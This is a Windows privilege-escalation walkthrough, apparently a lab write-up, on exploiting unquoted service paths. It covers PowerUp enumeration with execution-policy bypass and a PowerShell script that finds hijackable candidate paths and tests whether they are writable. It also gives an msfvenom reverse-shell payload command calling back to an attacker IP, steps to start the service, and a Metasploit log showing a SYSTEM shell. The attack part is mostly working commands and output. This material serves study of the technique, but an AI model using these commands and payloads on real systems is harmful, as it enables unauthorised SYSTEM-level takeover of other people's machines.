Unquoted Service Paths

If the path used to start a service is not quoted (wrapped in double quotes) and contains spaces, we can drop our own executable at one of the points where the path is ambiguous and have the service start it instead of its real binary. For example: if a service has a path of C:\Program Files\My Service\myservice.exe rather than "C:\Program Files\My Service\myservice.exe", the service control manager hands the unquoted string to CreateProcess, which tries C:\Program.exe first, then C:\Program Files\My.exe, and only then C:\Program Files\My Service\myservice.exe. If either of the earlier candidates exists it is executed in the service's security context (often LocalSystem). Quoting the path prevents this entirely, because the whole quoted string is treated as the executable name.

PowerUp (from PowerSploit) lists services with unquoted paths as part of Invoke-AllChecks:

powershell -ep bypass
. .\PowerUp.ps1
Invoke-AllChecks
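To see exactly what the loader would try, here is the same check written out by hand in PowerShell. This is an added example, not code from the page or from PowerUp; the function name Get-UnquotedServicePath is my own, and it assumes Get-CimInstance is available (PowerShell 3 or later). It enumerates every service, skips quoted paths and paths without spaces, computes each intermediate <prefix>.exe that CreateProcess would try before the real binary, and tests whether the directory for that candidate is writable by creating and deleting a zero-byte probe file.

```powershell
# Added example (not from the original page, not PowerUp code): enumerate
# services whose ImagePath is unquoted and contains a space, list every
# intermediate executable the loader would try before the real one, and
# test whether the directory for each candidate is writable.
function Get-UnquotedServicePath {
    [CmdletBinding()]
    param()

    foreach ($svc in (Get-CimInstance -ClassName Win32_Service)) {
        $path = $svc.PathName
        if ([string]::IsNullOrWhiteSpace($path)) { continue }

        # A quoted path is passed to CreateProcess as one token; nothing to hijack.
        if ($path.TrimStart().StartsWith('"')) { continue }

        # Drop trailing arguments: keep everything up to the first ".exe".
        $exe = $path
        if ($path -match '^(?<exe>.*?\.exe)') { $exe = $Matches['exe'] }

        # No space in the executable path means no ambiguity.
        if ($exe -notmatch ' ') { continue }

        # CreateProcess cuts the string at each space in turn and appends .exe,
        # so "C:\Program Files\My Service\x.exe" yields C:\Program.exe and
        # C:\Program Files\My.exe before the real binary is reached.
        $parts = $exe -split ' '
        for ($i = 1; $i -lt $parts.Count; $i++) {
            $candidate = ($parts[0..($i - 1)] -join ' ') + '.exe'
            $dir = Split-Path -Parent $candidate

            # Writability test: try to create and delete a zero-byte probe file
            # (an ACL read can miss inherited or group-based rights; a real write
            # attempt is what matters).
            $writable = $false
            if (Test-Path -LiteralPath $dir -PathType Container) {
                $probe = Join-Path $dir ([IO.Path]::GetRandomFileName())
                try {
                    [IO.File]::WriteAllText($probe, '')
                    Remove-Item -LiteralPath $probe -Force
                    $writable = $true
                } catch {
                    $writable = $false
                }
            }

            [pscustomobject]@{
                Service   = $svc.Name
                RunsAs    = $svc.StartName
                StartMode = $svc.StartMode
                ImagePath = $path
                Candidate = $candidate
                Writable  = $writable
            }
        }
    }
}

# Show only the candidates we could actually drop a binary at.
Get-UnquotedServicePath | Where-Object Writable | Format-Table -AutoSize
```

The Candidate column is the exact file name to create. Before building a payload, also note RunsAs (LocalSystem is the interesting case) and StartMode: if the current user cannot start the service, an Auto-start service can still be triggered by a reboot.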

In this service's path the “Common Files” folder has a space in its name, and the directory it sits in is writable by everyone, so we can create a payload named “Common.exe” and place it next to the “Common Files” folder: the loader tries ...\Common.exe before it ever descends into “Common Files”. Putting the payload inside “Common Files” does nothing, because that location is never tried.

msfvenom -p windows/shell/reverse_tcp LHOST=10.4.26.4 LPORT=5555 -f exe > Common.exe

A plain exe does not answer the service control manager, so the SCM kills it about 30 seconds after start (error 1053); the shell normally calls back before that, but -f exe-service produces a binary that registers as a service and stays running.

Start the multi/handler first (payload windows/shell/reverse_tcp, LHOST and LPORT matching the msfvenom command), then start the service on the target:

sc start unquotedsvc

If sc start is denied for the current user, check whether the service is set to auto-start and trigger it with a reboot instead. The handler then receives the connection:

msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.4.26.4:5555
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 10.10.159.221
[*] Command shell session 1 opened (10.4.26.4:5555 -> 10.10.159.221:49218) at 2021-10-18 00:18:07 -0400

C:\Windows\system32>whoami
whoami
nt authority\system